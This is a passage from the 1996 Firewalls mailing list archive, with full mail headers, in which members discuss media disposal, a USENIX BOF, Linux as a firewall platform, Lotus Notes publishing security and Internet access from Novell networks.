13:10:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA23788 for firewalls-outgoing; Sat, 13 Jan 1996 13:02:39 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA23783 for ; Sat, 13 Jan 1996 13:02:34 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id QAA21739; Sat, 13 Jan 1996 16:01:05 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id QAA01982; Sat, 13 Jan 1996 16:01:00 -0500 (EST) Date: Sat, 13 Jan 1996 16:00:57 -0500 (EST) From: "Paul D. Robertson" To: john paine cc: Kent Hamilton , firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 13 Jan 1996, john paine wrote: > Right now, there is a red hammer for the equipment, but the TS > disposal method is (if I can remember the order correctly) deguassing, > shredding, incineration and fusing (into a block of metallic ash). > That sounds about right. The sledge was when I was in Germany, and the highest thing we had on-site was Secret. Ther were a couple of times when I'd have liked to have been able to take it to the 360 itself. When I was at the White House, someone else used to take care of getting rid of equipment, as we didn't have the means to do it on-site. To stay somewhat on-topic, does anyone have any interesting corporate policies about the removal of dead media from their sites? Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Sat Jan 13 13:25:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA25013 for firewalls-outgoing; Sat, 13 Jan 1996 13:20:43 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA25005; Sat, 13 Jan 1996 13:20:38 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 13 Jan 1996 13:20:58 +0100 To: "Paul D. Robertson" , john paine From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Cc: Kent Hamilton , firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 4:00 PM 1/13/96, Paul D. Robertson wrote: >To stay somewhat on-topic, does anyone have any interesting corporate >policies about the removal of dead media from their sites? While a somewhat interesting/amusing issue, I don't think it has any particular relevance to Firewalls. Let's let this thread die... -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Sat Jan 13 13:40:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA25462 for firewalls-outgoing; Sat, 13 Jan 1996 13:28:40 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA25454 for ; Sat, 13 Jan 1996 13:28:35 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 13 Jan 1996 13:28:55 +0100 To: Firewalls@GreatCircle.COM From: Brent@GreatCircle.COM (Brent Chapman) Subject: Firewalls BOF at USENIX in San Diego, Wed 24 Jan, 10-11pm Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Firewalls Birds of a Feather session (BOF) at the USENIX conference in San Diego later this month will be on Wednesday night, 24 Jan, from 10-11pm. As is traditional, it will be held immediately after the CERT BOF (9-10pm), in the same room. As is also traditional, I'll be refereeing. As is NOT traditional, the USENIX reception is on Wednesday this time (it's usually on Thursday), just before the CERT and Firewalls BOFs. So, like usual, many folks will be feeling no pain by the time the Firewalls BOF starts. The official description of the BOF: The Firewalls BOF is a place for folks interested in the design, construction, operation, and maintenance of Internet security firewall systems to get together and swap tips, tricks, questions, and answers about their creations. The BOF will be refereed by Brent Chapman, manager of the Firewalls mailing list and coauthor of the O'Reilly & Associates book "Building Internet Firewalls". For more informationa about the conference, visit http://www.usenix.org/ or send email to conference@usenix.org or call the USENIX conference office at 714/588-8649. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Sat Jan 13 16:25:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11660 for firewalls-outgoing; Sat, 13 Jan 1996 16:09:29 -0800 (PST) Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA11640 for ; Sat, 13 Jan 1996 16:09:23 -0800 (PST) Received: from wv.wv.mentorg.com by newsgw.mentorg.com (8.6.4/CF5.22R) id TAA10884; Sat, 13 Jan 1996 19:08:11 -0500 Received: from pdxml2.mentorg.com by wv.wv.mentorg.com (8.6.8.1/CF5.22R) id QAA11217; Sat, 13 Jan 1996 16:08:20 -0800 Message-ID: Date: 13 Jan 1996 16:08:53 -0800 From: "E-Mail Admin" Subject: Off-Topic- Selling Firewall To: firewalls@greatcircle.com X-Mailer: Mail*Link SMTP/QM 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mail*Link(r) SMTP Off-Topic: Selling Firewalls Received: by pdxml2.mentorg.com with SMTP;7 Jan 1996 08:02:17 -0800 Received: from relay4.UU.NET by newsgw.mentorg.com (8.6.4/CF5.22R) id KAA29854; Sun, 7 Jan 1996 10:56:50 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzxmt14000; Sun, 7 Jan 1996 10:54:56 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10968 for firewalls-outgoing; Sun, 7 Jan 1996 05:16:49 -0800 (PST) Received: from vogon.muc.de (vogon.muc.de [193.174.4.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10963 for ; Sun, 7 Jan 1996 05:16:38 -0800 (PST) Received: from cottage ([194.94.228.134]) by vogon.muc.de with SMTP id <93554-2>; Sun, 7 Jan 1996 14:15:08 +0100 Comments: Authenticated sender is From: "Andreas Grau" To: firewalls@greatcircle.com Date: Sun, 7 Jan 1996 15:12:30 +0100 Subject: Off-Topic: Selling Firewalls Reply-to: grau@muc.de X-mailer: Pegasus Mail for Windows (v2.23) Message-Id: <96Jan7.141508met.93554-2@vogon.muc.de> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please don't flame me for this (possibly) off-topic question, but I think, the best answer for my question is with the members of this great list. I started working for a VAR of firewalls and other network related products. When it comes to writing proposals, I feel there must be tools to effectively support the selling process - how to draw network designs - how to calculate network topology, eg. IP-numbers and netmasks - how to calculate the costs for the equipment (firewalls, routers ...) - how to ... How do you network consultants and reseller work out there, how do you make your life easier when it comes to desktop work. I feel there are better tools than M$-Word or Powerpoint to generate good proposals and solutions. TIA, Andreas -- Andreas Grau grau@muc.de From firewalls-owner Sat Jan 13 19:55:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA03163 for firewalls-outgoing; Sat, 13 Jan 1996 19:51:41 -0800 (PST) Received: from wire.paladin.com (wire.paladin.com [198.69.226.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA03150 for ; Sat, 13 Jan 1996 19:51:35 -0800 (PST) Received: (cjwoods@localhost) by wire.paladin.com (8.6.8/8.6.5) id PAA00454; Sat, 13 Jan 1996 15:00:07 -0500 Date: Sat, 13 Jan 1996 15:00:07 -0500 (EST) From: Chris Woods To: Dana Brewer cc: firewalls@GreatCircle.COM Subject: Re: Linux as a firewall In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Dana Brewer wrote: > I've noticed that a lot of people say they use Linux as part of their > Internet firewall. But now I've had a company tell me that Linux isn't a > true multi-tasking operating system, so it shouldn't be used as a > firewall. What's the true story here? Ideally, in our situation, the > bastion host would be the firewall, the WWW server, the ftp server, the > Usenet news server, etc... Is this completely unrealistic? My guess is that that company, like many others, is not comfortable with the thought of running free software in a mission-critical environment (reasonable fear, IMHO, until you actually use linux...). Many larger companies are not comfotable unless they're paying through the nose for something. Linux has all the limitations of any intel-based OS. However, I have run networks on all linux machines, supporting thousands of users. I ran the systems for a fairly large ISP. THe main web server was a P90 with 32MB RAM running Apache 0.6.5 httpd, and it didn't even break a sweat. There have been problems with threading in linux, and the solution for that (which affected performance only in extreme cases) was to run a non-forking http server. TIS' fwtk offers quite a bit of flexibility. We are devising a solution whereby we build firewalls for clients, using a linux machine, fwtk, and running mailservers, http servers, ftp servers, and DNS servers on that machine. In short: linux/intel is a very *very* cost-effective solution; you get "more bang for your buck" with linux than with any other platform that I've worked with, until you reach the limitations of the intel-based architecture. That ceiling is very high, though, especially with the advent of SMP linux. Chris Woods Systems Administrator cjwoods@paladin.com (office) Paladin Computing Solutions cjwoods@gigotech.net (home) http://www.paladin.com "A computer without Windows is like a fish without a bicycle." From firewalls-owner Sun Jan 14 00:55:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA02224 for firewalls-outgoing; Sun, 14 Jan 1996 00:40:40 -0800 (PST) Received: from whirlwind.momentum.com.au (whirlwind.momentum.com.au [203.2.238.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA02196 for ; Sun, 14 Jan 1996 00:40:24 -0800 (PST) Received: (from uucp@localhost) by whirlwind.momentum.com.au (8.6.12/8.6.12) id QAA11281; Sun, 14 Jan 1996 16:39:14 +0800 Received: from aristoi.momentum.com.au(203.2.238.138) by whirlwind via smap (V1.3mjr) id sma011276; Sun Jan 14 16:38:53 1996 X-Sender: todd@mailhost.momentum.com.au Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 14 Jan 1996 16:39:47 +0800 To: Firewalls@GreatCircle.COM From: todd@momentum.com.au (Todd Hooper) Subject: Re: Lotus Notes' Internotes Web Navigator Cc: gblolmxb@ibmmail.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Blackman (gblolmxb@ibmmail.com) writes: > On 13/12/95 (or 12/13/95 for those of you in the colonies), Lotus > announced the integration of their Internotes Publisher product with > soon-to-be-released Notes 4. They also announced Web navigator > software for the Notes client. > > Has anyone got any other info on this? Such as: > > o how are HTML retrive requests routed through a Notes infrastructure > to the Notes server > > o What sort of security is provided at the Notes server, e.g. is a > seperate firewall need between the ISP line & the Server? > > o Are FTP & SMTP links in web pages supported? > > o Has anyone 'seen' it working? I'm not sure exactly which component you are asking about, but I'll have a shot at it! I haven't worked with the Notes 4 integrated Navigator component, but we have successfully prototyped and implemented a couple of client systems using the Internotes Webpublisher component. It is a useful product for automated translation and organisation of large Web sites. WebPublisher (put simply) is a Notes server task which turns administrator selected Notes databases into HTML files on the Notes server. In all of our implementations, an automated process then picks up the HTML, passes it out thru the firewall on to the corporate Web server, linking it into the existing document hierarchy at the correct point. About the only security issues I can see: 1. Translation and publishing of the wrong database There are three specific checkpoints to avoid this. One - separate servers for highly sensitive Notes work. Two - properly secured and administered WebPublisher config database. Three - HTML transfer process requires each Notes database to be explicitly named on both the source and destination host. 2. Requiring Web forms input to Notes via CGI's The WebPublisher system does allow you to take Web input and have it end up in Notes databases. This won't work when you use a setup where the actual Web serving is done by a different machine to the Notes serving. If you were to allow this, you would need to analyse the security of the CGI running directly on your NT or OS/2 Notes server and make a decision based on that. You could probably make a case that it is no better or worse than your average Unix CGI, but a wise approach may be to maintain a separate Notes server regardless. Regards, Todd -- Todd Hooper Internet : todd@momentum.com.au Momentum Pty Ltd Phone : 09 380 4372 Western Australia Fax : 09 380 4371 From firewalls-owner Sun Jan 14 02:25:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA10075 for firewalls-outgoing; Sun, 14 Jan 1996 02:13:30 -0800 (PST) Received: from solair1.inter.NL.net (solair1.inter.NL.net [193.78.240.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA10070 for ; Sun, 14 Jan 1996 02:13:24 -0800 (PST) Received: from asp99-15.Amsterdam.NL.net by solair1.inter.NL.net (5.65b/solair1.Inter.NL.net-1.31) id AA01632; Sun, 14 Jan 1996 11:12:21 +0100 Date: Sun, 14 Jan 1996 11:12:21 +0100 Message-Id: <9601141012.AA01632@solair1.inter.NL.net> X-Sender: avos@solair1.inter.NL.net (Unverified) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: avos@kpmg.nl (Arjan Vos) Subject: Internet-access from Novell X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A client of mine wishes to offer access to the Internet to her employees (circa 50 employees). The company uses a Novell Netware 4 network with Netscape 2.0 installed and they are thinking about using Lan Workplace for the TCP/IP stack. My questions are: - Is the use of Netscape and Lan Workplace a good idea or are there better alternatives for Novell to offer Internet-access? - If someone knows any other solutions for offering Internet-access from Novell, please let me know, and if possible, give me an indication of the costs. - When using IPX, is there a "natural firewall" (TCP/IP vs IPX); which other security -measures must be taken? Thanks, Arjan Vos From firewalls-owner Sun Jan 14 02:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA10900 for firewalls-outgoing; Sun, 14 Jan 1996 02:31:51 -0800 (PST) Received: from whirlwind.momentum.com.au (whirlwind.momentum.com.au [203.2.238.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA10870 for ; Sun, 14 Jan 1996 02:31:28 -0800 (PST) Received: (from uucp@localhost) by whirlwind.momentum.com.au (8.6.12/8.6.12) id SAA12105; Sun, 14 Jan 1996 18:30:18 +0800 Received: from aristoi.momentum.com.au(203.2.238.138) by whirlwind via smap (V1.3mjr) id sma012072; Sun Jan 14 18:29:50 1996 X-Sender: todd@mailhost.momentum.com.au Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 14 Jan 1996 18:30:45 +0800 To: Firewalls@GreatCircle.COM From: todd@momentum.com.au (Todd Hooper) Subject: Re: Linux as a firewall Cc: dana@nav.cc.tx.us Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dana writes: >I've noticed that a lot of people say they use Linux as part of their >Internet firewall. But now I've had a company tell me that Linux isn't a >true multi-tasking operating system, so it shouldn't be used as a >firewall. What's the true story here? Ignoring some of the more technical arguments, IMHO there are two management reasons which may cause you to examine the role of Linux (or indeed Unix on Intel) in a mission critical security application such as a firewall. These need to be taken into account at the cost/benefit stage where you are choosing the platform, not six months down the track when you are committed to the solution. They are: 1. Support infrastructure for non-commercial operating systems Is there commercial technical support available? Does it fit in with your existing support arrangements for mission critical systems? In my locality, the answer to this question is no. Relying on non-commercial and Internet based support is highy questionable, especially if the failure of the system means you may not have any access to the main support channel. 2. Ability of Intel vendors to provide hardware maintenance and spares (This point applies to any Intel based system. I assume that the top tier Intel vendors such as Digital and Compaq won't have a problem providing this when you buy one of their top end servers, but you need to figure that into the cost of the solution, rather than doing your cost/benefit on the price of the cheapest Intel clone.) If your Intel based host melts down into a pile of ash, can your Intel vendor provide a decent level of hardware maintenance? Can they provide a replacement machine with an identical configuration? Given the pace at which Intel motherboard technology advances, most designs are usually obsolete within 6 months. Don't forget all of the supporting storage, video and networking cards as well which your system requires to function. If you can't get an identical replacement system, how is that going to affect your ability to rebuild the system from backups? Is your Unix implementation such that a backup from the original host with hardware configuration X will be useless when you move to the replacement host with hardware configuration Y? I am not an expert in this area but I am led to believe that it can be problematic to recover from this type of situation without reworking some of the installation to accommodate the hardware changes. If you change something fundamental in your firewall configuration in order to get the system back online then IMHO you are obliged to revisit a significant part of the design and testing phase to ensure nothing has broken during the process due to some sort of cascade effect. How is that going to affect your downtime? As an example - the SCSI card model X in your Intel host dies after a year of faithful service. You can't buy a model X anymore so you need to get a model Y. But your Unix on Intel implementation hasn't been updated for six months and it doesn't support Y. How quickly can you to a) update the operating system b) install the hardware and get the server back online and c) ensure that the new software & hardware has not affected the integrity of the firewall? If you intend to buy spare parts for all of the critical components, then factor the cost in at the start. Or evaluate the service from a vendor where they keep identical replacement parts for some years, and can provide it under a hardware maintenance contact within a specified response time (all at a cost, of course). I should point out that these points are based on experience in discussing this issue with many clients, rather than any sort of backhanded attempt to slur Intel based solutions in favour of traditional Unix vendors. We can and do run many Intel based solutions here, but only after the appropriate analysis has taken these factors into account. Regards, Todd -- Todd Hooper Internet : todd@momentum.com.au Momentum Pty Ltd Phone : 09 380 4372 Western Australia Fax : 09 380 4371 From firewalls-owner Sun Jan 14 05:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA26913 for firewalls-outgoing; Sun, 14 Jan 1996 05:36:09 -0800 (PST) Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA26908 for ; Sun, 14 Jan 1996 05:36:05 -0800 (PST) Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAE25C.076C32F0@big486.ed-com.com>; Sun, 14 Jan 1996 08:40:59 -0500 Message-ID: From: Ed Woodrick To: "firewalls@GreatCircle.COM" Subject: RE: Internet-access from Novell Date: Sun, 14 Jan 1996 08:40:58 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BAE25C.076F4030" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. Contact your mail administrator for information about upgrading your reader to a version that supports MIME. ------ =_NextPart_000_01BAE25C.076F4030 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Arjan, You might want to review the Product from CISCO, Internet Junction = Passport. It is billed as a "Connect your Novell Network to the Internet = in one easy step."=20 The following is a list of highlights: Simple and Easy Installation NO TCP/IP at the desktop Isolates NetWare server from the Internet Preserves Network Investment Single IP address for the entire network. Internet Junction, a CISCO Company http://www.ij.com (415) 934-3600 (415) 934-3601 Fax I have no experience with the product, but it does seem to fit a Novell = network fairly perfectly. Ed Woodrick EDCOM ewoodrick@ed-com.com ---------- From: avos@kpmg.nl[SMTP:avos@kpmg.nl] Sent: Sunday, January 14, 1996 5:12 AM To: firewalls@GreatCircle.COM Subject: Internet-access from Novell A client of mine wishes to offer access to the Internet to her employees = (circa 50 employees). The company uses a Novell Netware 4 network with=20 Netscape 2.0 installed and they are thinking about using Lan Workplace = for=20 the TCP/IP stack. My questions are: - Is the use of Netscape and Lan Workplace a good idea or are there = better=20 alternatives for Novell to offer Internet-access? - If someone knows any other solutions for offering Internet-access from = Novell, please let me know, and if possible, give me an indication of = the costs. - When using IPX, is there a "natural firewall" (TCP/IP vs IPX); which = other=20 security -measures must be taken? Thanks, Arjan Vos ------ =_NextPart_000_01BAE25C.076F4030-- From firewalls-owner Sun Jan 14 05:55:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA26601 for firewalls-outgoing; Sun, 14 Jan 1996 05:26:39 -0800 (PST) Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA26594 for ; Sun, 14 Jan 1996 05:26:34 -0800 (PST) Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAE25A.AD2EA800@big486.ed-com.com>; Sun, 14 Jan 1996 08:31:18 -0500 Message-ID: From: Ed Woodrick To: "Firewalls@GreatCircle.COM" Subject: RE: Linux as a firewall Date: Sun, 14 Jan 1996 08:31:17 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BAE25A.AD302EA0" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. Contact your mail administrator for information about upgrading your reader to a version that supports MIME. ------ =_NextPart_000_01BAE25A.AD302EA0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Todd, So would you suggest, 1. Making sure that you spend $50,000 on a vendor that you are not = exactly sure will be around next year? 2. Spend $30,000 for hardware plus $15,000 in hardware and OS = maintenance instead of buying two exact duplicates of a system?=20 I would have answered that LINUX is as true of a multi-tasking system as = just about anything else. NOTHING is truly multi-tasking unless it has = more than one processor. Plus, the serial or ethernet connections on = either side of the firewall are both serial in operation. You don't want = "multi-tasking" to process the packets, you want just plain raw speed. Remember that the safest firewall is one that is stopped, not running! Ed Woodrick ---------- From: todd@momentum.com.au[SMTP:todd@momentum.com.au] Sent: Sunday, January 14, 1996 5:30 AM To: Firewalls@GreatCircle.COM Cc: dana@nav.cc.tx.us Subject: Re: Linux as a firewall=20 Dana writes: >I've noticed that a lot of people say they use Linux as part of their >Internet firewall. But now I've had a company tell me that Linux isn't = a >true multi-tasking operating system, so it shouldn't be used as a >firewall. What's the true story here? Ignoring some of the more technical arguments, IMHO there are two management reasons which may cause you to examine the role of Linux (or indeed Unix on Intel) in a mission critical security application such as a firewall. These need to be taken into account at the cost/benefit stage where you are choosing the platform, not six months down the track when you are committed to the solution. They are: 1. Support infrastructure for non-commercial operating systems 2. Ability of Intel vendors to provide hardware maintenance and spares Regards, Todd -- Todd Hooper Internet : todd@momentum.com.au Momentum Pty Ltd Phone : 09 380 4372 Western Australia Fax : 09 380 4371 ------ =_NextPart_000_01BAE25A.AD302EA0-- From firewalls-owner Sun Jan 14 06:40:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA28367 for firewalls-outgoing; Sun, 14 Jan 1996 06:29:51 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA28362 for ; Sun, 14 Jan 1996 06:29:47 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzymj21589; Sun, 14 Jan 1996 09:28:38 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA07347; Sun, 14 Jan 96 09:18:40 EST Date: Sun, 14 Jan 1996 09:18:39 -0500 (EST) From: Sick Puppy Subject: Re: Relijon, Firewalls, Filosofi To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As several list participants pointed out, Version 2.0 of Firewall-1 supports encryption and authentication. Thanks, I didn't know that. (Even with two brains *I* still don't know everything) Last Friday I was watching some hacker d00d come out of an X.25 gateway and bang away at a site that has a large network. From the responses he got back it looks like that site uses TIS stuff and he didn't get in. Anyway, watching that guy raised a question. I know that Clueless Cats Corp is planning to synchronize its Sybase databases with the central offices of Top Dogs Plc in Europe, using IP tunneled through X.25, because the draft implementation plan they threw out in their trash explains it in detail. How can they be sure that the X.25 gateway their IP application is talking to is really the machine it is supposed to talk to and not merely some d00d who is good at IP spoofing? How does authentication work in this situation? Sick Puppy, the Cat_Eating_Dawg I'm CERTified, crucified like a saviour for misbehaviour, I'm CERTified -=:( "You can't crack security really well unless you understand it" ):=- -=:( Tsu Szu Poo, Ancient Japanese Warrior Dawg ):=- P.S. Nothing I say should be construed as an admission of illegal or unethical behaviour on my part. I didn't do it, you didn't see me, and the only real evidence you could have is what I am not going to tell you. That "Boss" button there erases everything on my hard disks, to DoD standards. From firewalls-owner Sun Jan 14 07:13:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA28942 for firewalls-outgoing; Sun, 14 Jan 1996 06:59:11 -0800 (PST) Received: from dax.sai.com (dax.sai.com [198.137.245.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA28937 for ; Sun, 14 Jan 1996 06:59:06 -0800 (PST) Received: from dax.sai.com by dax.sai.com with smtp (Smail3.1.29.1 #3) id m0tbTtm-003pMUC; Sun, 14 Jan 96 09:59 EST Date: Sun, 14 Jan 1996 09:59:09 -0500 (EST) From: Darryl Wagoner To: Todd Hooper cc: Firewalls@GreatCircle.COM, dana@nav.cc.tx.us Subject: Re: Linux as a firewall In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, I don't normally get into these discussing, but there is enough flaws in logic that I must reply. On Sun, 14 Jan 1996, Todd Hooper wrote: > Dana writes: > > >I've noticed that a lot of people say they use Linux as part of their > >Internet firewall. But now I've had a company tell me that Linux isn't a > >true multi-tasking operating system, so it shouldn't be used as a > >firewall. What's the true story here? The person that told you that Linux isn't a multi-tasking OS doesn't have a clue. It is a very good multi-tasking and multi-users system. > They are: > > 1. Support infrastructure for non-commercial operating systems > > Is there commercial technical support available? Does it fit in > with your existing support arrangements for mission critical > systems? > > In my locality, the answer to this question is no. Relying on > non-commercial and Internet based support is highy questionable, > especially if the failure of the system means you may not have any > access to the main support channel. Not every living or visiting Australia, I can't say too much about the support. But it seems unlikely that the OS would be have a failure that wouldn't allow you access to the net. As far as hard wear failure in many cases a hot spare is a affordable as a maintain contract when you add in down time. > 2. Ability of Intel vendors to provide hardware maintenance and spares > > If your Intel based host melts down into a pile of ash, can your > Intel vendor provide a decent level of hardware maintenance? > Can they provide a replacement machine with an identical > configuration? Given the pace at which Intel motherboard > technology advances, most designs are usually obsolete within > 6 months. Don't forget all of the supporting storage, video > and networking cards as well which your system requires > to function. Obsolete doesn't mean that you can't get them. The may be more of a problem with COT OS than Linux. Linux support for new hardware is very good as well, because of the large group of programmers working on it. > If you can't get an identical replacement system, how is that > going to affect your ability to rebuild the system from backups? > Is your Unix implementation such that a backup from the original > host with hardware configuration X will be useless when you > move to the replacement host with hardware configuration Y? I > am not an expert in this area but I am led to believe that it can > be problematic to recover from this type of situation without > reworking some of the installation to accommodate the hardware > changes. This isn't as big of a problem as it sounds. Let look at the list of possible crash and burn parts: * Mother board - This is really the big concern as they charge quickly and OS can be thrown by the changes. But if you don't try to stay on the bleeding edge then Linux will support just about any mother board you throw at it. * Memory - Never heard of Linux having problems with memory * Disk controller - Not a big risk, but buy a spare * Vidio - the all support CGA mode which for a firewall is all you need. * Ethernet - very standard and very cheap buy a spare If it is mission critical then I would have a hot spare. This would mean no downtime and you can take your time in solving your first FW problem. Software support is another issue. Take any vendor you wish to name and you are looking at 3-6 weeks min. for a show stopper problem in their OS to be fixed. I have had problems fixed on Linux within hours of reporting it. If your problem is only effecting you or they don't consider it a show stopper (which in most cases they don't) then it will be fixed in the next release. With Linux you always have the option to fix it in house. -- Darryl Wagoner darryl@sai.com http://www.sai.com/ Office: 603.672.0736 Fax: 603-672-4846 Web Pages for hire. Check out NH & MA Movies http://www.sai.com/movies From firewalls-owner Sun Jan 14 07:25:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA29370 for firewalls-outgoing; Sun, 14 Jan 1996 07:16:11 -0800 (PST) Received: from wire.paladin.com (wire.paladin.com [198.69.226.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA29357 for ; Sun, 14 Jan 1996 07:16:05 -0800 (PST) Received: (cjwoods@localhost) by wire.paladin.com (8.6.8/8.6.5) id KAA03177; Sun, 14 Jan 1996 10:10:05 -0500 Date: Sun, 14 Jan 1996 10:10:05 -0500 (EST) From: Chris Woods To: Ed Woodrick cc: "Firewalls@GreatCircle.COM" Subject: RE: Linux as a firewall In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 Jan 1996, Ed Woodrick wrote: > Todd, > > So would you suggest, [...] OK, let's nip this in the bud right here. I see an OS war coming, as always happens when discussing the feasibility of {linux,freebsd,netbsd,name-your-free-os-here} in a particular application. Suffice it to say that in evaluating a product (whether it's free or not) one must gather as much information as possible from various different sources, weigh the pros and cons of each alternative, and make the decision based on cost, performance, ease of use, or whatever else is an important consideration. This is not directed at Ed, or Todd, or anyone specific; just that we don't need a "My OS is better than your OS" thing happening here. Chris Woods Systems Administrator cjwoods@paladin.com (office) Paladin Computing Solutions cjwoods@gigotech.net (home) http://www.paladin.com "A computer without Windows is like a fish without a bicycle." From firewalls-owner Sun Jan 14 08:25:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA01407 for firewalls-outgoing; Sun, 14 Jan 1996 08:14:28 -0800 (PST) Received: from iez.com ([194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA01402 for ; Sun, 14 Jan 1996 08:14:18 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA06982; 